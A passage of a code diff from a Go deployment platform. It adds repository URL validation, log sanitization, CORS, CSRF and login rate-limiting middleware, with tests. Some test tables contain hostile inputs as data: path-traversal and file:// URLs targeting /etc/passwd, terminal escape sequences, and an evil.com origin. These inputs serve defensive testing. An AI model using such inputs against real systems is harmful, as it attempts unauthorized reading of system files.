+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusSeeOther, recorder.Code)
+	assert.Equal(t, "/apps/"+createdApp.ID, recorder.Header().Get("Location"))
+}
+
+func TestHandleCancelDeployReturns404ForUnknownApp(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	request := httptest.NewRequest(
+		http.MethodPost,
+		"/apps/nonexistent/deployments/cancel",
+		nil,
+	)
+	request = addChiURLParams(request, map[string]string{"id": "nonexistent"})
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleCancelDeploy()
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusNotFound, recorder.Code)
+}
+
 func TestHandleWebhookReturns404ForUnknownSecret(t *testing.T) {
 	t.Parallel()
 

internal/handlers/port_validation_test.go

@@ -0,0 +1,39 @@
+package handlers //nolint:testpackage // tests unexported parsePortValues function
+
+import "testing"
+
+func TestParsePortValues(t *testing.T) {
+	t.Parallel()
+
+	tests := []struct {
+		name      string
+		host      string
+		container string
+		wantHost  int
+		wantCont  int
+		wantValid bool
+	}{
+		{"valid ports", "8080", "80", 8080, 80, true},
+		{"port 1", "1", "1", 1, 1, true},
+		{"port 65535", "65535", "65535", 65535, 65535, true},
+		{"host port above 65535", "99999", "80", 0, 0, false},
+		{"container port above 65535", "80", "99999", 0, 0, false},
+		{"both ports above 65535", "70000", "70000", 0, 0, false},
+		{"zero port", "0", "80", 0, 0, false},
+		{"negative port", "-1", "80", 0, 0, false},
+		{"non-numeric", "abc", "80", 0, 0, false},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			host, cont, valid := parsePortValues(tt.host, tt.container)
+			if host != tt.wantHost || cont != tt.wantCont || valid != tt.wantValid {
+				t.Errorf("parsePortValues(%q, %q) = (%d, %d, %v), want (%d, %d, %v)",
+					tt.host, tt.container, host, cont, valid,
+					tt.wantHost, tt.wantCont, tt.wantValid)
+			}
+		})
+	}
+}

internal/handlers/render_template_test.go

@@ -0,0 +1,73 @@
+package handlers_test
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+// TestRenderTemplateBuffersOutput verifies that successful template rendering
+// produces a complete HTML response (not partial/corrupt).
+func TestRenderTemplateBuffersOutput(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	// The setup page is simple and has no DB dependencies
+	request := httptest.NewRequest(http.MethodGet, "/setup", nil)
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleSetupGET()
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusOK, recorder.Code)
+
+	body := recorder.Body.String()
+	// A properly buffered response should contain the closing </html> tag,
+	// proving the full template was rendered before being sent.
+	assert.Contains(t, body, "</html>")
+	// Should NOT contain the error text that would be appended on failure
+	assert.NotContains(t, body, "Internal Server Error")
+}
+
+// TestDashboardRenderTemplateBuffersOutput verifies the dashboard handler
+// also uses buffered template rendering.
+func TestDashboardRenderTemplateBuffersOutput(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	request := httptest.NewRequest(http.MethodGet, "/", nil)
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleDashboard()
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusOK, recorder.Code)
+
+	body := recorder.Body.String()
+	assert.Contains(t, body, "</html>")
+	assert.NotContains(t, body, "Internal Server Error")
+}
+
+// TestLoginRenderTemplateBuffersOutput verifies the login handler
+// uses buffered template rendering.
+func TestLoginRenderTemplateBuffersOutput(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	request := httptest.NewRequest(http.MethodGet, "/login", nil)
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleLoginGET()
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusOK, recorder.Code)
+
+	body := recorder.Body.String()
+	assert.Contains(t, body, "</html>")
+	assert.NotContains(t, body, "Internal Server Error")
+}

internal/handlers/repo_url_validation.go

@@ -0,0 +1,77 @@
+package handlers
+
+import (
+	"errors"
+	"net/url"
+	"regexp"
+	"strings"
+)
+
+// Repo URL validation errors.
+var (
+	errRepoURLEmpty   = errors.New("repository URL must not be empty")
+	errRepoURLScheme  = errors.New("file:// URLs are not allowed for security reasons")
+	errRepoURLInvalid = errors.New("repository URL must use https://, http://, ssh://, git://, or git@host:path format")
+	errRepoURLNoHost  = errors.New("repository URL must include a host")
+	errRepoURLNoPath  = errors.New("repository URL must include a path")
+)
+
+// scpLikeRepoRe matches SCP-like git URLs: git@host:path (e.g. git@github.com:user/repo.git).
+// Only the "git" user is allowed, as that is the standard for SSH deploy keys.
+var scpLikeRepoRe = regexp.MustCompile(`^git@[a-zA-Z0-9._-]+:.+$`)
+
+// allowedRepoSchemes lists the URL schemes accepted for repository URLs.
+//
+//nolint:gochecknoglobals // package-level constant map parsed once
+var allowedRepoSchemes = map[string]bool{
+	"https": true,
+	"http":  true,
+	"ssh":   true,
+	"git":   true,
+}
+
+// validateRepoURL checks that the given repository URL is valid and uses an allowed scheme.
+func validateRepoURL(repoURL string) error {
+	if strings.TrimSpace(repoURL) == "" {
+		return errRepoURLEmpty
+	}
+
+	// Reject path traversal in any URL format
+	if strings.Contains(repoURL, "..") {
+		return errRepoURLInvalid
+	}
+
+	// Check for SCP-like git URLs first (git@host:path)
+	if scpLikeRepoRe.MatchString(repoURL) {
+		return nil
+	}
+
+	// Reject file:// explicitly
+	if strings.HasPrefix(strings.ToLower(repoURL), "file://") {
+		return errRepoURLScheme
+	}
+
+	return validateParsedRepoURL(repoURL)
+}
+
+// validateParsedRepoURL validates a standard URL-format repository URL.
+func validateParsedRepoURL(repoURL string) error {
+	parsed, err := url.Parse(repoURL)
+	if err != nil {
+		return errRepoURLInvalid
+	}
+
+	if !allowedRepoSchemes[strings.ToLower(parsed.Scheme)] {
+		return errRepoURLInvalid
+	}
+
+	if parsed.Host == "" {
+		return errRepoURLNoHost
+	}
+
+	if parsed.Path == "" || parsed.Path == "/" {
+		return errRepoURLNoPath
+	}
+
+	return nil
+}

internal/handlers/repo_url_validation_test.go

@@ -0,0 +1,60 @@
+package handlers_test
+
+import (
+	"testing"
+
+	"git.eeqj.de/sneak/upaas/internal/handlers"
+)
+
+func TestValidateRepoURL(t *testing.T) {
+	t.Parallel()
+
+	tests := []struct {
+		name    string
+		url     string
+		wantErr bool
+	}{
+		// Valid URLs
+		{name: "https URL", url: "https://github.com/user/repo.git", wantErr: false},
+		{name: "http URL", url: "http://github.com/user/repo.git", wantErr: false},
+		{name: "ssh URL", url: "ssh://git@github.com/user/repo.git", wantErr: false},
+		{name: "git URL", url: "git://github.com/user/repo.git", wantErr: false},
+		{name: "SCP-like URL", url: "git@github.com:user/repo.git", wantErr: false},
+		{name: "SCP-like with dots", url: "git@git.example.com:org/repo.git", wantErr: false},
+		{name: "https without .git", url: "https://github.com/user/repo", wantErr: false},
+		{name: "https with port", url: "https://git.example.com:8443/user/repo.git", wantErr: false},
+
+		// Invalid URLs
+		{name: "empty string", url: "", wantErr: true},
+		{name: "whitespace only", url: "   ", wantErr: true},
+		{name: "file URL", url: "file:///etc/passwd", wantErr: true},
+		{name: "file URL uppercase", url: "FILE:///etc/passwd", wantErr: true},
+		{name: "bare path", url: "/some/local/path", wantErr: true},
+		{name: "relative path", url: "../repo", wantErr: true},
+		{name: "just a word", url: "notaurl", wantErr: true},
+		{name: "ftp URL", url: "ftp://example.com/repo.git", wantErr: true},
+		{name: "no host https", url: "https:///path", wantErr: true},
+		{name: "no path https", url: "https://github.com", wantErr: true},
+		{name: "no path https trailing slash", url: "https://github.com/", wantErr: true},
+		{name: "SCP-like non-git user", url: "root@github.com:user/repo.git", wantErr: true},
+		{name: "SCP-like arbitrary user", url: "admin@github.com:user/repo.git", wantErr: true},
+		{name: "path traversal SCP", url: "git@github.com:../../etc/passwd", wantErr: true},
+		{name: "path traversal https", url: "https://github.com/user/../../../etc/passwd", wantErr: true},
+		{name: "path traversal in middle", url: "https://github.com/user/repo/../secret", wantErr: true},
+	}
+
+	for _, tc := range tests {
+		t.Run(tc.name, func(t *testing.T) {
+			t.Parallel()
+
+			err := handlers.ValidateRepoURLForTest(tc.url)
+			if tc.wantErr && err == nil {
+				t.Errorf("ValidateRepoURLForTest(%q) = nil, want error", tc.url)
+			}
+
+			if !tc.wantErr && err != nil {
+				t.Errorf("ValidateRepoURLForTest(%q) = %v, want nil", tc.url, err)
+			}
+		})
+	}
+}

internal/handlers/sanitize.go

@@ -0,0 +1,30 @@
+package handlers
+
+import (
+	"regexp"
+	"strings"
+)
+
+// ansiEscapePattern matches ANSI escape sequences (CSI, OSC, and single-character escapes).
+var ansiEscapePattern = regexp.MustCompile(`(\x1b\[[0-9;]*[a-zA-Z]|\x1b\][^\x07]*\x07|\x1b[^[\]])`)
+
+// SanitizeLogs strips ANSI escape sequences and non-printable control characters
+// from container log output. Newlines (\n), carriage returns (\r), and tabs (\t)
+// are preserved. This ensures that attacker-controlled container output cannot
+// inject terminal escape sequences or other dangerous control characters.
+func SanitizeLogs(input string) string {
+	// Strip ANSI escape sequences
+	result := ansiEscapePattern.ReplaceAllString(input, "")
+
+	// Strip remaining non-printable characters (keep \n, \r, \t)
+	var b strings.Builder
+	b.Grow(len(result))
+
+	for _, r := range result {
+		if r == '\n' || r == '\r' || r == '\t' || r >= ' ' {
+			b.WriteRune(r)
+		}
+	}
+
+	return b.String()
+}

internal/handlers/sanitize_test.go

@@ -0,0 +1,84 @@
+package handlers_test
+
+import (
+	"testing"
+
+	"git.eeqj.de/sneak/upaas/internal/handlers"
+)
+
+func TestSanitizeLogs(t *testing.T) { //nolint:funlen // table-driven tests
+	t.Parallel()
+
+	tests := []struct {
+		name     string
+		input    string
+		expected string
+	}{
+		{
+			name:     "plain text unchanged",
+			input:    "hello world\n",
+			expected: "hello world\n",
+		},
+		{
+			name:     "strips ANSI color codes",
+			input:    "\x1b[31mERROR\x1b[0m: something failed\n",
+			expected: "ERROR: something failed\n",
+		},
+		{
+			name:     "strips OSC sequences",
+			input:    "\x1b]0;window title\x07normal text\n",
+			expected: "normal text\n",
+		},
+		{
+			name:     "strips null bytes",
+			input:    "hello\x00world\n",
+			expected: "helloworld\n",
+		},
+		{
+			name:     "strips bell characters",
+			input:    "alert\x07here\n",
+			expected: "alerthere\n",
+		},
+		{
+			name:     "preserves tabs",
+			input:    "field1\tfield2\tfield3\n",
+			expected: "field1\tfield2\tfield3\n",
+		},
+		{
+			name:     "preserves carriage returns",
+			input:    "line1\r\nline2\r\n",
+			expected: "line1\r\nline2\r\n",
+		},
+		{
+			name:     "strips mixed escape sequences",
+			input:    "\x1b[32m2024-01-01\x1b[0m \x1b[1mINFO\x1b[0m starting\x00\n",
+			expected: "2024-01-01 INFO starting\n",
+		},
+		{
+			name:     "empty string",
+			input:    "",
+			expected: "",
+		},
+		{
+			name:     "only control characters",
+			input:    "\x00\x01\x02\x03",
+			expected: "",
+		},
+		{
+			name:     "cursor movement sequences stripped",
+			input:    "\x1b[2J\x1b[H\x1b[3Atext\n",
+			expected: "text\n",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			got := handlers.SanitizeLogs(tt.input)
+			if got != tt.expected {
+				t.Errorf("SanitizeLogs(%q) = %q, want %q", tt.input, got, tt.expected)
+			}
+		})
+	}
+}

internal/handlers/setup.go

@@ -15,14 +15,10 @@ const (
 func (h *Handlers) HandleSetupGET() http.HandlerFunc {
 	tmpl := templates.GetParsed()
 
-	return func(writer http.ResponseWriter, _ *http.Request) {
+	return func(writer http.ResponseWriter, request *http.Request) {
-		data := h.addGlobals(map[string]any{})
+		data := h.addGlobals(map[string]any{}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "setup.html", data)
+		h.renderTemplate(writer, tmpl, "setup.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
 	}
 }
 
@@ -54,14 +50,15 @@ func validateSetupForm(formData setupFormData) string {
 func (h *Handlers) renderSetupError(
 	tmpl *templates.TemplateExecutor,
 	writer http.ResponseWriter,
+	request *http.Request,
 	username string,
 	errorMsg string,
 ) {
 	data := h.addGlobals(map[string]any{
 		"Username": username,
 		"Error":    errorMsg,
-	})
+	}, request)
-	_ = tmpl.ExecuteTemplate(writer, "setup.html", data)
+	h.renderTemplate(writer, tmpl, "setup.html", data)
 }
 
 // HandleSetupPOST handles the setup form submission.
@@ -83,7 +80,7 @@ func (h *Handlers) HandleSetupPOST() http.HandlerFunc {
 		}
 
 		if validationErr := validateSetupForm(formData); validationErr != "" {
-			h.renderSetupError(tmpl, writer, formData.username, validationErr)
+			h.renderSetupError(tmpl, writer, request, formData.username, validationErr)
 
 			return
 		}
@@ -95,7 +92,7 @@ func (h *Handlers) HandleSetupPOST() http.HandlerFunc {
 		)
 		if createErr != nil {
 			h.log.Error("failed to create user", "error", createErr)
-			h.renderSetupError(tmpl, writer, formData.username, "Failed to create user")
+			h.renderSetupError(tmpl, writer, request, formData.username, "Failed to create user")
 
 			return
 		}
@@ -106,6 +103,7 @@ func (h *Handlers) HandleSetupPOST() http.HandlerFunc {
 			h.renderSetupError(
 				tmpl,
 				writer,
+				request,
 				formData.username,
 				"Failed to create session",
 			)

internal/handlers/tail_validation_test.go

@@ -0,0 +1,40 @@
+package handlers_test
+
+import (
+	"testing"
+
+	"git.eeqj.de/sneak/upaas/internal/handlers"
+)
+
+func TestSanitizeTail(t *testing.T) {
+	t.Parallel()
+
+	tests := []struct {
+		name     string
+		input    string
+		expected string
+	}{
+		{"empty uses default", "", handlers.DefaultLogTail},
+		{"valid small number", "50", "50"},
+		{"valid max boundary", "500", "500"},
+		{"exceeds max clamped", "501", "500"},
+		{"very large clamped", "999999", "500"},
+		{"non-numeric uses default", "abc", handlers.DefaultLogTail},
+		{"all keyword uses default", "all", handlers.DefaultLogTail},
+		{"negative uses default", "-1", handlers.DefaultLogTail},
+		{"zero uses default", "0", handlers.DefaultLogTail},
+		{"float uses default", "1.5", handlers.DefaultLogTail},
+		{"one is valid", "1", "1"},
+	}
+
+	for _, tc := range tests {
+		t.Run(tc.name, func(t *testing.T) {
+			t.Parallel()
+
+			got := handlers.SanitizeTail(tc.input)
+			if got != tc.expected {
+				t.Errorf("sanitizeTail(%q) = %q, want %q", tc.input, got, tc.expected)
+			}
+		})
+	}
+}

internal/handlers/volume_validation_test.go

@@ -0,0 +1,34 @@
+package handlers //nolint:testpackage // tests exported ValidateVolumePath function
+
+import "testing"
+
+func TestValidateVolumePath(t *testing.T) {
+	t.Parallel()
+
+	tests := []struct {
+		name    string
+		path    string
+		wantErr bool
+	}{
+		{"valid absolute path", "/data/myapp", false},
+		{"root path", "/", false},
+		{"empty path", "", true},
+		{"relative path", "data/myapp", true},
+		{"path with dotdot", "/data/../etc", true},
+		{"path with trailing slash", "/data/", true},
+		{"path with double slash", "/data//myapp", true},
+		{"single dot path", ".", true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			err := ValidateVolumePath(tt.path)
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateVolumePath(%q) error = %v, wantErr %v",
+					tt.path, err, tt.wantErr)
+			}
+		})
+	}
+}

internal/handlers/webhook.go

@@ -9,6 +9,9 @@ import (
 	"git.eeqj.de/sneak/upaas/internal/models"
 )
 
+// maxWebhookBodySize is the maximum allowed size of a webhook request body (1MB).
+const maxWebhookBodySize = 1 << 20
+
 // HandleWebhook handles incoming Gitea webhooks.
 func (h *Handlers) HandleWebhook() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -38,8 +41,8 @@ func (h *Handlers) HandleWebhook() http.HandlerFunc {
 			return
 		}
 
-		// Read request body
+		// Read request body with size limit to prevent memory exhaustion
-		body, readErr := io.ReadAll(request.Body)
+		body, readErr := io.ReadAll(io.LimitReader(request.Body, maxWebhookBodySize))
 		if readErr != nil {
 			h.log.Error("failed to read webhook body", "error", readErr)
 			http.Error(writer, "Bad Request", http.StatusBadRequest)

internal/logger/testing.go

@@ -0,0 +1,11 @@
+package logger
+
+import "log/slog"
+
+// NewForTest creates a Logger wrapping the given slog.Logger, for use in tests.
+func NewForTest(log *slog.Logger) *Logger {
+	return &Logger{
+		log:   log,
+		level: new(slog.LevelVar),
+	}
+}

internal/middleware/cors_test.go

@@ -0,0 +1,81 @@
+package middleware //nolint:testpackage // tests internal CORS behavior
+
+import (
+	"log/slog"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+
+	"git.eeqj.de/sneak/upaas/internal/config"
+)
+
+//nolint:gosec // test credentials
+func newCORSTestMiddleware(corsOrigins string) *Middleware {
+	return &Middleware{
+		log: slog.Default(),
+		params: &Params{
+			Config: &config.Config{
+				CORSOrigins:   corsOrigins,
+				SessionSecret: "test-secret-32-bytes-long-enough",
+			},
+		},
+	}
+}
+
+func TestCORS_NoOriginsConfigured_NoCORSHeaders(t *testing.T) {
+	t.Parallel()
+
+	m := newCORSTestMiddleware("")
+	handler := m.CORS()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodGet, "/", nil)
+	req.Header.Set("Origin", "https://evil.com")
+
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	assert.Empty(t, rec.Header().Get("Access-Control-Allow-Origin"),
+		"expected no CORS headers when no origins configured")
+}
+
+func TestCORS_OriginsConfigured_AllowsMatchingOrigin(t *testing.T) {
+	t.Parallel()
+
+	m := newCORSTestMiddleware("https://app.example.com,https://other.example.com")
+	handler := m.CORS()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodGet, "/", nil)
+	req.Header.Set("Origin", "https://app.example.com")
+
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	assert.Equal(t, "https://app.example.com",
+		rec.Header().Get("Access-Control-Allow-Origin"))
+	assert.Equal(t, "true",
+		rec.Header().Get("Access-Control-Allow-Credentials"))
+}
+
+func TestCORS_OriginsConfigured_RejectsNonMatchingOrigin(t *testing.T) {
+	t.Parallel()
+
+	m := newCORSTestMiddleware("https://app.example.com")
+	handler := m.CORS()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodGet, "/", nil)
+	req.Header.Set("Origin", "https://evil.com")
+
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	assert.Empty(t, rec.Header().Get("Access-Control-Allow-Origin"),
+		"expected no CORS headers for non-matching origin")
+}

internal/middleware/middleware.go

@@ -3,14 +3,20 @@ package middleware
 
 import (
 	"log/slog"
+	"math"
 	"net"
 	"net/http"
+	"strconv"
+	"strings"
+	"sync"
 	"time"
 
 	"github.com/99designs/basicauth-go"
 	"github.com/go-chi/chi/v5/middleware"
 	"github.com/go-chi/cors"
+	"github.com/gorilla/csrf"
 	"go.uber.org/fx"
+	"golang.org/x/time/rate"
 
 	"git.eeqj.de/sneak/upaas/internal/config"
 	"git.eeqj.de/sneak/upaas/internal/globals"
@@ -85,7 +91,7 @@ func (m *Middleware) Logging() func(http.Handler) http.Handler {
 					"request_id", reqID,
 					"referer", request.Referer(),
 					"proto", request.Proto,
-					"remoteIP", ipFromHostPort(request.RemoteAddr),
+					"remoteIP", realIP(request),
 					"status", lrw.statusCode,
 					"latency_ms", latency.Milliseconds(),
 				)
@@ -105,18 +111,114 @@ func ipFromHostPort(hostPort string) string {
 	return host
 }
 
+// trustedProxyNets are RFC1918 and loopback CIDRs whose proxy headers we trust.
+//
+//nolint:gochecknoglobals // package-level constant nets parsed once
+var trustedProxyNets = func() []*net.IPNet {
+	cidrs := []string{
+		"10.0.0.0/8",
+		"172.16.0.0/12",
+		"192.168.0.0/16",
+		"127.0.0.0/8",
+		"::1/128",
+		"fc00::/7",
+	}
+
+	nets := make([]*net.IPNet, 0, len(cidrs))
+
+	for _, cidr := range cidrs {
+		_, n, _ := net.ParseCIDR(cidr)
+		nets = append(nets, n)
+	}
+
+	return nets
+}()
+
+// isTrustedProxy reports whether ip is in an RFC1918, loopback, or ULA range.
+func isTrustedProxy(ip net.IP) bool {
+	for _, n := range trustedProxyNets {
+		if n.Contains(ip) {
+			return true
+		}
+	}
+
+	return false
+}
+
+// realIP extracts the client's real IP address from the request.
+// Proxy headers (X-Real-IP, X-Forwarded-For) are only trusted when the
+// direct connection originates from an RFC1918/loopback address.
+// Otherwise, headers are ignored and RemoteAddr is used (fail closed).
+func realIP(r *http.Request) string {
+	addr := ipFromHostPort(r.RemoteAddr)
+	remoteIP := net.ParseIP(addr)
+
+	// Only trust proxy headers from private/loopback sources.
+	if remoteIP == nil || !isTrustedProxy(remoteIP) {
+		return addr
+	}
+
+	// 1. X-Real-IP (set by Traefik/nginx)
+	if ip := strings.TrimSpace(r.Header.Get("X-Real-IP")); ip != "" {
+		return ip
+	}
+
+	// 2. X-Forwarded-For: take the first (leftmost/client) IP
+	if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
+		if parts := strings.SplitN(xff, ",", 2); len(parts) > 0 { //nolint:mnd
+			if ip := strings.TrimSpace(parts[0]); ip != "" {
+				return ip
+			}
+		}
+	}
+
+	// 3. Fall back to RemoteAddr
+	return addr
+}
+
 // CORS returns CORS middleware.
+// When UPAAS_CORS_ORIGINS is empty (default), no CORS headers are sent
+// (same-origin only). When configured, only the specified origins are
+// allowed and credentials (cookies) are permitted.
 func (m *Middleware) CORS() func(http.Handler) http.Handler {
+	origins := parseCORSOrigins(m.params.Config.CORSOrigins)
+
+	// No origins configured — no CORS headers (same-origin policy).
+	if len(origins) == 0 {
+		return func(next http.Handler) http.Handler {
+			return next
+		}
+	}
+
 	return cors.Handler(cors.Options{
-		AllowedOrigins:   []string{"*"},
+		AllowedOrigins:   origins,
 		AllowedMethods:   []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
 		AllowedHeaders:   []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
 		ExposedHeaders:   []string{"Link"},
-		AllowCredentials: false,
+		AllowCredentials: true,
 		MaxAge:           corsMaxAge,
 	})
 }
 
+// parseCORSOrigins splits a comma-separated origin string into a slice,
+// trimming whitespace. Returns nil if the input is empty.
+func parseCORSOrigins(raw string) []string {
+	if raw == "" {
+		return nil
+	}
+
+	parts := strings.Split(raw, ",")
+	origins := make([]string, 0, len(parts))
+
+	for _, p := range parts {
+		if o := strings.TrimSpace(p); o != "" {
+			origins = append(origins, o)
+		}
+	}
+
+	return origins
+}
+
 // MetricsAuth returns basic auth middleware for metrics endpoint.
 func (m *Middleware) MetricsAuth() func(http.Handler) http.Handler {
 	if m.params.Config.MetricsUsername == "" {
@@ -152,6 +254,143 @@ func (m *Middleware) SessionAuth() func(http.Handler) http.Handler {
 	}
 }
 
+// CSRF returns CSRF protection middleware using gorilla/csrf.
+func (m *Middleware) CSRF() func(http.Handler) http.Handler {
+	return csrf.Protect(
+		[]byte(m.params.Config.SessionSecret),
+		csrf.Secure(false), // Allow HTTP for development; reverse proxy handles TLS
+		csrf.Path("/"),
+	)
+}
+
+// loginRateLimit configures the login rate limiter.
+const (
+	loginRateLimit      = rate.Limit(5.0 / 60.0) // 5 requests per 60 seconds
+	loginBurst          = 5                      // allow burst of 5
+	limiterExpiry       = 10 * time.Minute       // evict entries not seen in 10 minutes
+	limiterCleanupEvery = 1 * time.Minute        // sweep interval
+)
+
+// ipLimiterEntry stores a rate limiter with its last-seen timestamp.
+type ipLimiterEntry struct {
+	limiter  *rate.Limiter
+	lastSeen time.Time
+}
+
+// ipLimiter tracks per-IP rate limiters for login attempts with automatic
+// eviction of stale entries to prevent unbounded memory growth.
+type ipLimiter struct {
+	mu        sync.Mutex
+	limiters  map[string]*ipLimiterEntry
+	lastSweep time.Time
+}
+
+func newIPLimiter() *ipLimiter {
+	return &ipLimiter{
+		limiters:  make(map[string]*ipLimiterEntry),
+		lastSweep: time.Now(),
+	}
+}
+
+// sweep removes entries not seen within limiterExpiry. Must be called with mu held.
+func (i *ipLimiter) sweep(now time.Time) {
+	for ip, entry := range i.limiters {
+		if now.Sub(entry.lastSeen) > limiterExpiry {
+			delete(i.limiters, ip)
+		}
+	}
+
+	i.lastSweep = now
+}
+
+func (i *ipLimiter) getLimiter(ip string) *rate.Limiter {
+	i.mu.Lock()
+	defer i.mu.Unlock()
+
+	now := time.Now()
+
+	// Lazy sweep: clean up stale entries periodically.
+	if now.Sub(i.lastSweep) >= limiterCleanupEvery {
+		i.sweep(now)
+	}
+
+	entry, exists := i.limiters[ip]
+	if !exists {
+		entry = &ipLimiterEntry{
+			limiter: rate.NewLimiter(loginRateLimit, loginBurst),
+		}
+		i.limiters[ip] = entry
+	}
+
+	entry.lastSeen = now
+
+	return entry.limiter
+}
+
+// loginLimiter is the singleton IP rate limiter for login attempts.
+//
+//nolint:gochecknoglobals // intentional singleton for rate limiting state
+var loginLimiter = newIPLimiter()
+
+// LoginRateLimit returns middleware that rate-limits login attempts per IP.
+// It allows 5 attempts per minute and returns 429 Too Many Requests when exceeded.
+func (m *Middleware) LoginRateLimit() func(http.Handler) http.Handler {
+	return func(next http.Handler) http.Handler {
+		return http.HandlerFunc(func(
+			writer http.ResponseWriter,
+			request *http.Request,
+		) {
+			ip := realIP(request)
+			limiter := loginLimiter.getLimiter(ip)
+
+			if !limiter.Allow() {
+				m.log.WarnContext(request.Context(), "login rate limit exceeded",
+					"remoteIP", ip,
+				)
+
+				// Compute seconds until the next token is available.
+				reservation := limiter.Reserve()
+				delay := reservation.Delay()
+				reservation.Cancel()
+
+				retryAfter := max(int(math.Ceil(delay.Seconds())), 1)
+				writer.Header().Set("Retry-After", strconv.Itoa(retryAfter))
+
+				http.Error(
+					writer,
+					"Too Many Requests",
+					http.StatusTooManyRequests,
+				)
+
+				return
+			}
+
+			next.ServeHTTP(writer, request)
+		})
+	}
+}
+
+// APISessionAuth returns middleware that requires session authentication for API routes.
+// Unlike SessionAuth, it returns JSON 401 responses instead of redirecting to /login.
+func (m *Middleware) APISessionAuth() func(http.Handler) http.Handler {
+	return func(next http.Handler) http.Handler {
+		return http.HandlerFunc(func(
+			writer http.ResponseWriter,
+			request *http.Request,
+		) {
+			user, err := m.params.Auth.GetCurrentUser(request.Context(), request)
+			if err != nil || user == nil {
+				writer.Header().Set("Content-Type", "application/json")
+				http.Error(writer, `{"error":"unauthorized"}`, http.StatusUnauthorized)
+
+				return
+			}
+
+			next.ServeHTTP(writer, request)
+		})
+	}
+}
+
 // SetupRequired returns middleware that redirects to setup if no user exists.
 func (m *Middleware) SetupRequired() func(http.Handler) http.Handler {
 	return func(next http.Handler) http.Handler {
@@ -172,8 +411,14 @@ func (m *Middleware) SetupRequired() func(http.Handler) http.Handler {
 			}
 
 			if setupRequired {
-				// Allow access to setup page
+				path := request.URL.Path
-				if request.URL.Path == "/setup" {
+
+				// Allow access to setup page, health endpoint, static
+				// assets, and API routes even before setup is complete.
+				if path == "/setup" ||
+					path == "/health" ||
+					strings.HasPrefix(path, "/s/") ||
+					strings.HasPrefix(path, "/api/") {
 					next.ServeHTTP(writer, request)
 
 					return

internal/middleware/ratelimit_test.go

@@ -0,0 +1,141 @@
+package middleware //nolint:testpackage // tests unexported types and globals
+
+import (
+	"log/slog"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+
+	"git.eeqj.de/sneak/upaas/internal/config"
+)
+
+func newTestMiddleware(t *testing.T) *Middleware {
+	t.Helper()
+
+	return &Middleware{
+		log: slog.Default(),
+		params: &Params{
+			Config: &config.Config{},
+		},
+	}
+}
+
+//nolint:paralleltest // mutates global loginLimiter
+func TestLoginRateLimitAllowsUpToBurst(t *testing.T) {
+	// Reset the global limiter to get clean state
+	loginLimiter = newIPLimiter()
+
+	mw := newTestMiddleware(t)
+
+	handler := mw.LoginRateLimit()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	// First 5 requests should succeed (burst)
+	for i := range 5 {
+		req := httptest.NewRequest(http.MethodPost, "/login", nil)
+		req.RemoteAddr = "192.168.1.1:12345"
+		rec := httptest.NewRecorder()
+		handler.ServeHTTP(rec, req)
+		assert.Equal(t, http.StatusOK, rec.Code, "request %d should succeed", i+1)
+	}
+
+	// 6th request should be rate limited
+	req := httptest.NewRequest(http.MethodPost, "/login", nil)
+	req.RemoteAddr = "192.168.1.1:12345"
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+	assert.Equal(t, http.StatusTooManyRequests, rec.Code, "6th request should be rate limited")
+}
+
+//nolint:paralleltest // mutates global loginLimiter
+func TestLoginRateLimitIsolatesIPs(t *testing.T) {
+	loginLimiter = newIPLimiter()
+
+	mw := newTestMiddleware(t)
+
+	handler := mw.LoginRateLimit()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	// Exhaust IP1's budget
+	for range 5 {
+		req := httptest.NewRequest(http.MethodPost, "/login", nil)
+		req.RemoteAddr = "10.0.0.1:1234"
+		rec := httptest.NewRecorder()
